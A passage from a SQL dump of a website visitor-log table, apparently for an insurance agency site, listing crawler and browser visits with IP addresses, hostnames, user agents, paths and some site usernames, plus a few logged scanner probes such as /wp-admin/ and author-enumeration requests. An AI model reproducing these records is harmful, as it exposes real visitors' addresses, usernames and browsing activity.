+http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(18683,'0b_f00b6167f86875fbc7cc14bc24e3d210','1460999291','157.55.39.13','msnbot-157-55-39-13.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18684,'0b_1ed44ccd028f85c385fa5307c2337814','1461000137','88.198.230.79','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(18687,'0b_1ed44ccd028f85c385fa5307c2337814','1461000139','88.198.230.79','majestic12.co.uk','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(18689,'0b_1ed44ccd028f85c385fa5307c2337814','1461000141','88.198.230.79','majestic12.co.uk','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(18690,'0b_1ed44ccd028f85c385fa5307c2337814','1461000143','88.198.230.79','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(18693,'0b_4319575c98a3d6c67341af8f2e825dc5','1461000470','73.76.218.70','c-73-76-218-70.hsd1.tx.comcast.net','/','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-N910T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36','','',0,'Android 5','SamsungBrowser 4','us','360 x 640','','','','','','0','0',0),(18696,'0b_4319575c98a3d6c67341af8f2e825dc5','1461000473','73.76.218.70','c-73-76-218-70.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-N910T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 4','us','360 x 640','','','','','','0','0',0),(18699,'0b_4319575c98a3d6c67341af8f2e825dc5','1461000488','73.76.218.70','c-73-76-218-70.hsd1.tx.comcast.net','/','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-N910T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 4','us','360 x 640','','','','','','0','0',0),(18702,'0b_4319575c98a3d6c67341af8f2e825dc5','1461000489','73.76.218.70','c-73-76-218-70.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-N910T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 4','us','360 x 640','','','','','','0','0',0),(18704,'0b_5dc58c98a642175da9e3f2ca74090e43','1461001130','70.214.68.82','82.sub-70-214-68.myvzw.com','/','Apache-HttpClient/UNAVAILABLE (java 1.4)','','',0,'','','','','','Apache','','','','0','0',0),(18707,'0b_58c94b8c612ea00c981ffe15ed921989','1461001653','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(18708,'0b_58c94b8c612ea00c981ffe15ed921989','1461001656','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(18711,'0b_efc1fc8143d7da24d5b259e71991b7d0','1461002073','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(18713,'0b_efc1fc8143d7da24d5b259e71991b7d0','1461002074','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(18714,'0b_efc1fc8143d7da24d5b259e71991b7d0','1461002106','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(18717,'0b_efc1fc8143d7da24d5b259e71991b7d0','1461002151','67.85.210.17','ool-4355d211.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(18720,'0b_eb9ac9e164973ff09ab99ca9b4ea8dab','1461004151','69.116.57.20','ool-45743914.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(18723,'0b_eb9ac9e164973ff09ab99ca9b4ea8dab','1461004152','69.116.57.20','ool-45743914.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(18725,'0b_eb9ac9e164973ff09ab99ca9b4ea8dab','1461004156','69.116.57.20','ool-45743914.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(18726,'0b_eb9ac9e164973ff09ab99ca9b4ea8dab','1461004239','69.116.57.20','ool-45743914.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','jsimcha','','0','51',0),(18729,'0b_3ce10bdee37e1f6afc1d8c65834f6080','1461004387','115.115.199.202','115.115.199.202.static-bangalore.tcl.net.in','/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','in','','','','','','','0','0',0),(18731,'0b_3ce10bdee37e1f6afc1d8c65834f6080','1461004390','115.115.199.202','115.115.199.202.static-bangalore.tcl.net.in','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Linux','Chrome 47','in','','','','','','','0','0',0),(18734,'0b_45414799e6b3507e72ace791dd80d882','1461004425','70.39.157.195','70.39.157.195','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(18735,'0b_ac3ea1fb2aceaae9cf2da1883fa9a14f','1461005188','91.200.12.53','dedic658.hidehost.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1991.5 Safari/537.36','','',0,'MacOSX','Chrome 36','us','','','','','','','0','0',0),(18738,'0b_396b20200137a433965bc06210298549','1461005753','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18740,'0b_4c4aa2e826ad231df72dfd2d314d3a8d','1461006373','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','0',0),(18741,'0b_4c4aa2e826ad231df72dfd2d314d3a8d','1461006374','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','0',0),(18744,'0b_4c4aa2e826ad231df72dfd2d314d3a8d','1461006377','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(18747,'0b_4c4aa2e826ad231df72dfd2d314d3a8d','1461006384','67.85.210.17','ool-4355d211.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(18750,'0b_4d48ffbc92b8050ba0774a550aa545c7','1461007117','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18752,'0b_4d48ffbc92b8050ba0774a550aa545c7','1461007120','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18755,'0b_2eeffa335a9259b1026b7b11e91dbd7e','1461007463','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(18758,'0b_0e1a5117b4a16675344e2c930cf9112f','1461007556','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(18761,'0b_0e1a5117b4a16675344e2c930cf9112f','1461007559','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(18764,'0b_29f4366b0ef1ac9578d77a464e70f2f2','1461009684','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(18767,'0b_d746598246f44753a6da9be89ad87647','1461009738','50.74.240.14','mail.kentco.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(18768,'0b_d746598246f44753a6da9be89ad87647','1461009741','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(18771,'0b_d746598246f44753a6da9be89ad87647','1461009742','50.74.240.14','mail.kentco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(18773,'0b_d746598246f44753a6da9be89ad87647','1461009757','50.74.240.14','mail.kentco.com','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','51',0),(18774,'0b_d746598246f44753a6da9be89ad87647','1461009766','50.74.240.14','mail.kentco.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','51',0),(18776,'0b_29f4366b0ef1ac9578d77a464e70f2f2','1461010430','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(18779,'0b_29f4366b0ef1ac9578d77a464e70f2f2','1461010483','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(18780,'0b_29f4366b0ef1ac9578d77a464e70f2f2','1461010586','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(18782,'0b_29f4366b0ef1ac9578d77a464e70f2f2','1461010587','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(18783,'0b_0ebe0840c1bbb5fada275f599b2c63e6','1461012182','54.211.48.24','ec2-54-211-48-24.compute-1.amazonaws.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(18785,'0b_0ebe0840c1bbb5fada275f599b2c63e6','1461012183','54.211.48.24','ec2-54-211-48-24.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','http://www.empireins.com/','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(18788,'0b_379be9509a35b8567d2a767eeab6c3ec','1461012185','54.211.48.24','ec2-54-211-48-24.compute-1.amazonaws.com','/robots.txt','Python-urllib/1.17','','',0,'','','','','','Python-urllib','','','','0','0',0),(18791,'0b_0ebe0840c1bbb5fada275f599b2c63e6','1461012185','54.211.48.24','ec2-54-211-48-24.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(18794,'0b_0ebe0840c1bbb5fada275f599b2c63e6','1461012188','54.211.48.24','ec2-54-211-48-24.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(18795,'0b_976b37f65694134bdee7944cb59ae5f9','1461012564','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(18798,'0b_b15b16ff7e310acbe84b7ae7b438f918','1461012696','66.249.83.144,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(18800,'0b_1f2b04da91641791f080ed66a0f3b4d9','1461012821','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18801,'0b_ed821c025c23caa1b686accb00d00b8a','1461012842','66.102.6.173,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(18804,'0b_9f2c3624378d6cf5e3d04fe20d2fd31f','1461014356','40.77.167.20','msnbot-40-77-167-20.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18807,'0b_acf0f404f774fb07f74e28e581138874','1461015045','180.76.15.6','baiduspider-180-76-15-6.crawl.baidu.com','/comments/feed/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(18810,'0b_f761c097155deabf50d5eeb735281b4d','1461016312','178.63.86.11','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(18813,'0b_f761c097155deabf50d5eeb735281b4d','1461016322','178.63.86.11','majestic12.co.uk','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(18816,'0b_f761c097155deabf50d5eeb735281b4d','1461016324','178.63.86.11','majestic12.co.uk','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(18819,'0b_b4230a42fd8a8655694f70c7b9e65292','1461018045','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18822,'0b_99219b1bcb7259de5644cd8dbcce85c2','1461018337','66.102.6.173,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(18825,'0b_558b15e7f1a95a7402b74388c28b215b','1461018517','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18827,'0b_558b15e7f1a95a7402b74388c28b215b','1461018518','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(18830,'0b_14a4f42dd52338d20ad6c3fbfd2f4198','1461018554','66.87.116.124','66-87-116-124.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(18831,'0b_14a4f42dd52338d20ad6c3fbfd2f4198','1461018555','66.87.116.124','66-87-116-124.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(18834,'0b_0df0a7ab84ea7acdf2966d99d69fad0b','1461018771','195.154.56.126','195-154-56-126.rev.poneytelecom.eu','/contact/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(18836,'0b_08dcc6de0b8f865d7bf5577e77ed8132','1461018998','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/crafting-an-essay-9/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18839,'0b_08dcc6de0b8f865d7bf5577e77ed8132','1461019134','207.46.13.55','msnbot-207-46-13-55.search.msn.com','/SSO/235_29.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18842,'0b_8bc65faa4172d459bb4cc4b1fc05c514','1461022497','172.56.14.22','172.56.14.22','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-N910T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 4','us','','','','','','','0','0',0),(18845,'0b_a490894bccc4ca1eeca427e29380703d','1461023082','89.163.148.58','ju058.jupiter.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18846,'0b_a490894bccc4ca1eeca427e29380703d','1461023084','89.163.148.58','ju058.jupiter.fastwebserver.de','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18848,'0b_a490894bccc4ca1eeca427e29380703d','1461023088','89.163.148.58','ju058.jupiter.fastwebserver.de','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18849,'0b_a490894bccc4ca1eeca427e29380703d','1461023093','89.163.148.58','ju058.jupiter.fastwebserver.de','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18852,'0b_a490894bccc4ca1eeca427e29380703d','1461023095','89.163.148.58','ju058.jupiter.fastwebserver.de','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18855,'0b_a490894bccc4ca1eeca427e29380703d','1461023099','89.163.148.58','ju058.jupiter.fastwebserver.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(18857,'0b_5cc670b061c33ba749914876d854edde','1461029777','157.55.39.25','msnbot-157-55-39-25.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18860,'0b_b45b3bba22711bbc9c24d2d13713041b','1461029812','157.55.39.139','msnbot-157-55-39-139.search.msn.com','/hot.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18863,'0b_7e75a1b0c31768f00c6eede27c18bf02','1461035596','91.224.160.120','91.224.160.120','/admin/','Searching for Django sites. Please, don\\\'t send abuse, it is just single GET request!','','',0,'','','','','','Searching','','','','0','0',0),(18864,'0b_1e8c569c5f22dd2906c860342a10f948','1461039298','207.46.13.57','msnbot-207-46-13-57.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(18867,'0b_60d3b5e015b5924a474fc26c1b315c76','1461044901','52.37.108.213','ec2-52-37-108-213.us-west-2.compute.amazonaws.com','/','Apache-HttpClient/4.3.5 (java 1.5)','','',0,'','','','','','Apache','','','','0','0',0),(18870,'0b_dfb5714660a02ebdb433065c8ef76785','1461050826','185.2.65.25','65-25.colo.sta.blacknight.ie','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(18872,'0b_a2d741625015f75f1c2fda3c64058eb9','1461052188','185.2.65.25','65-25.colo.sta.blacknight.ie','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinVista','Firefox 15','ua','','','','','','','0','0',0),(18873,'0b_c1cd5640aea635de033e2a659245d455','1461052375','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/robots.txt','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(18876,'0b_c1cd5640aea635de033e2a659245d455','1461052381','208.43.225.84','54.e1.2bd0.ip4.static.sl-reverse.com','/','Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)','','',0,'','','','','','','','','','0','0',0),(18879,'0b_90cf19bc3abfa92d864cd6fbc538840b','1461053102','66.249.64.29','crawl-66-249-64-29.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(18881,'0b_f2d4feca8be3cbd55d17dff70ab1035d','1461054749','185.2.65.25','65-25.colo.sta.blacknight.ie','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP x64','Firefox 15','ua','','','','','','','0','0',0),(18884,'0b_a00e0823d8ef8bf89ef94386bd7fa448','1461055026','52.25.193.162','ec2-52-25-193-162.us-west-2.compute.amazonaws.com','/?author=1','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50','','',0,'WinXP','Opera 9','ru','','','','','','','0','0',0),(18887,'0b_59ddd42f4140465b9817e879a34b0070','1461055924','123.125.71.34','baiduspider-123-125-71-34.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(18890,'0b_59ddd42f4140465b9817e879a34b0070','1461055963','123.125.71.24','baiduspider-123-125-71-24.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(18893,'0b_d7ed79c97e922992161a6f72875887cc','1461055973','111.13.102.4','111.13.102.4','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(18894,'0b_788a3cd5d87ad008deac07273e8ab622','1461056004','157.55.39.139','msnbot-157-55-39-139.search.msn.com','[404] /pdf/avoid_1099.pdf','Mozilla/5.0 (compatible; bingbot/2.0; 